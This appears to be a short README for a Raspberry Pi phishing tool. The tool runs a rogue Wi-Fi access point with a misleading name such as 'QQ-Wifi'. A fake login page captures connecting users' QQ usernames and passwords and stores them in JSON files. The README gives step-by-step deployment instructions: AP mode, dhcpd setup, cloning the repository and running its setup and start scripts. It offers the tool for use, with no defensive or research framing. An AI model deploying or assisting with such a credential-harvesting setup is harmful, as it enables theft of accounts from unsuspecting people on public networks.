This tool will set a soft-ap named QQ-Wifi(or other confusing name you like). As someone connect this AP, his browser will pop a page and request user's QQ account and password to login. After he logins, the page will return no permission and save all infomation in json files. You know..
- Have a
raspberryPi
- Have a
wireless card
which supports raspberryPi - Connect your wireless card to raspberryPi and install the driver
- Switch your wireless card to
AP mode
- Install
dhcpd
and change the address pool to10.0.0.0/24
- Clone this repo
git clone https://github.com/tcz717/phishingPi.git
- Run
./setup.sh
- Run
./start.sh